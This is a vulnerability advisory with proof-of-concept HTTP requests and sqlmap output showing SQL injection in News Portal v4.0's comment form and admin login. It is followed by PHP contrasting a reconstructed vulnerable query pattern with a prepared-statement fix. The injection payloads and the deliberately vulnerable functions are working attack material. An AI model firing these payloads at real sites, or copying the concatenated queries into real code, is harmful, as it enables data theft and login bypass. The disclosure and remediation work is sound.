
News Portal v4.0 - SQL Injection (Unauthenticated)

# Exploit Title: News Portal v4.0 - SQL Injection (Unauthenticated)
# Date: 09/07/2023
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c
# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643
# Version: 4.0
# We are looking for Security Engineers and Security Administrators: https://www.pracuj.pl/PRACA/SECURITY-ENGINEER-WARSZAWA-PLOCKA-9-11,11,1002635314
# Tested on: Windows 10 with XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1.1L PHP/7.4.4.23
## Example 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
PARAM: name, email, comment
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
REQ:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
POST /newsportal/news-details.php?nid=13 HTTP/1.1
Origin: http://127.0.0.1
Sec-Fetch-User: ?1
Host: 127.0.0.1:80
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Content-Length: 277
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Connection: close
Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Ch-Ua-Platform: "Windows"
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Fetch-Dest: document

csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 10:55:26 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Set-Cookie: PHPSESSID=l7dg3s1in50ojigs4vm2p0r9s; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 146161

<script>alert("Comment submitted successfully.");</script>
<!DOCTYPE html>
<html lang="en">

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<title>News Portal | Home Page</title>
[...]
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
REQ:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
POST /newsportal/news-details.php?nid=13 HTTP/1.1
Origin: http://127.0.0.1
Sec-Fetch-User: ?1
Host: 127.0.0.1:80
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Content-Length: 276
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Connection: close
Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Ch-Ua-Platform: "Windows"
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Fetch-Dest: document

csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 10:56:06 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 525
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21
Stack trace:
#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')
#1 {main}
  thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
sqlmap example for param 'comment':
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:
---
Parameter: #2* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x73737373737373737373737373737373737373737373737373737373737373737373737373 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR ([...] FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2)[...]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))MZUX) AND 'bjco'='bjco&submit=
---
web application technology: PHP 8.1.17, Apache 2.4.56
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
## Example 2 - Login to admin panel
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
PARAM: username
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
REQ:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
POST /newsportal/admin/ HTTP/1.1
Host: 127.0.0.1
Content-Length: 42
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/newsportal/admin/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: userub_type=0; is_moderator=0; reply_sort_order=asc; showtimelog=yes; USER_UNIQ_AGENT=95E1B7D0AB9086D6B88E9ADFAACF07D887164827A5708ADF; ses_role=3; USER_UNIQ=117B06DA2FF9AABAD1A916992E92BB26; USERTYP=3; usertz=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8DBA9A451F44121C45180DF414AB6917; default_page=dashboard; current_filter=case; currency=usd; PHPSESSID-9795-sid=S7B0DQLPEBU74LS14J61E5Q3BE; Stelem__stickysidebarelement=[...]; wbcelastConnectjs=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8
Connection: close

username=admin'&password=test%40123&login=
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 11:00:53 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 505
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13
Stack trace:
#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'select adminuse...')
#1 {main}
  thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br />
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
REQ:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
POST /newsportal/admin/ HTTP/1.1
Host: 127.0.0.1
Content-Length: 43
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/newsportal/admin/
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: userub_type=0; is_moderator=0; reply_sort_order=asc; showtimelog=yes; USER_UNIQ_AGENT=95E1B7D0AB9086D6B88E9ADFAACF07D887164827A5708ADF; ses_role=3; USER_UNIQ=117B06DA2FF9AABAD1A916992E92BB26; USERTYP=3; usertz=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8DBA9A451F44121C45180DF414AB6917; default_page=dashboard; current_filter=case; currency=usd; PHPSESSID-9795-sid=S7B0DQLPEBU74LS14J61E5Q3BE; Stelem__stickysidebarelement=[...]; wbcelastConnectjs=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8
Connection: close

username=admin''&password=test%40123&login=
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
RES:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 11:02:15 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4733
Connection: close
Content-Type: text/html; charset=UTF-8

<script>alert("Invalid Details");</script>
<!DOCTYPE html>
<html lang="en">

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="News Portal">
<meta name="author" content="phpgurukul">
<!-- App title -->
<title>News Portal | Admin Panel</title>
[...]
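Both stack traces above end in mysqli_query() (news-details.php line 21 for the comment INSERT, admin/index.php line 13 for the login SELECT), which is the signature of form values being concatenated straight into the SQL text; the "Fatal error" bodies in the responses are a second weakness, since display_errors is on and the query fragment and file path reach the client. The PHP below is an added example and not code from the News Portal project: a hypothetical reconstruction of that pattern next to a prepared-statement rewrite that also keeps database errors server-side. The table and column names (tblcomments, tbladmin, newsId, AdminUserName, AdminPassword, ...) and the connection details are assumptions chosen for illustration.

```php
<?php
// Added example, not the News Portal project's own code. Table/column names
// and connection details are assumptions; only the two call sites named in
// the stack traces (news-details.php:21, admin/index.php:13) come from the advisory.

// Let mysqli throw exceptions instead of silently returning false ...
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
// ... but never render them to the client: the advisory's responses show the
// query fragment and the full file path leaking through "Fatal error" output.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// --- Reconstructed vulnerable pattern (assumed; do not use) -----------------
// Each form field is interpolated into the SQL text, so a single quote in
// `name` or `username` changes the statement, which is exactly what produces
// the "Uncaught mysqli_sql_exception" responses in the advisory.
function addCommentVulnerable(mysqli $con, int $nid, array $post): void
{
    $name = $post['name'];
    $email = $post['email'];
    $comment = $post['comment'];
    mysqli_query($con, "insert into tblcomments(newsId,name,emailId,comment,status)
        values('$nid','$name','$email','$comment','0')");
}

function adminLoginVulnerable(mysqli $con, string $username, string $password): bool
{
    $hash = md5($password);   // a 32-hex value like the one in the advisory's error text
    $res = mysqli_query($con, "select AdminUserName from tbladmin
        where AdminUserName='$username' and AdminPassword='$hash'");
    return mysqli_num_rows($res) > 0;
}

// --- Hardened version: prepared statements, input never enters the SQL text --
function addComment(mysqli $con, int $nid, array $post): void
{
    $name = (string) ($post['name'] ?? '');
    $email = (string) ($post['email'] ?? '');
    $comment = (string) ($post['comment'] ?? '');
    $stmt = $con->prepare(
        'INSERT INTO tblcomments (newsId, name, emailId, comment, status) VALUES (?, ?, ?, ?, 0)'
    );
    // Values travel to the server as bound parameters; quotes in them are data, not syntax.
    $stmt->bind_param('isss', $nid, $name, $email, $comment);
    $stmt->execute();
}

function adminLogin(mysqli $con, string $username, string $password): bool
{
    // Look the account up by name only; the password never appears in the query.
    $stmt = $con->prepare('SELECT AdminPassword FROM tbladmin WHERE AdminUserName = ?');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    if ($row === null) {
        return false;
    }
    // Constant-time comparison against the stored hash. An unsalted MD5 is
    // weak on its own; migrating to password_hash()/password_verify() is a
    // separate fix and does not change this query.
    return hash_equals($row['AdminPassword'], md5($password));
}

// Request handling: a malformed query can no longer be produced by input, and
// any other database failure is logged server-side and answered generically.
function handleCommentPost(mysqli $con, array $get, array $post): string
{
    try {
        addComment($con, (int) ($get['nid'] ?? 0), $post);
        return 'Comment submitted successfully.';
    } catch (mysqli_sql_exception $e) {
        error_log('news-details: ' . $e->getMessage());
        return 'Something went wrong, please try again later.';
    }
}

// Usage (assumed credentials):
// $con = new mysqli('127.0.0.1', 'newsportal', 'secret', 'newsportal');
// echo handleCommentPost($con, $_GET, $_POST);
// var_dump(adminLogin($con, $_POST['username'] ?? '', $_POST['password'] ?? ''));
```

With the prepared-statement version, the two probes shown in the advisory (a lone quote in `name`, a lone quote in `username`) simply become literal characters stored or compared as data, and sqlmap's boolean-, error- and time-based techniques lose their injection point; the error-based technique additionally loses its channel once display_errors is off.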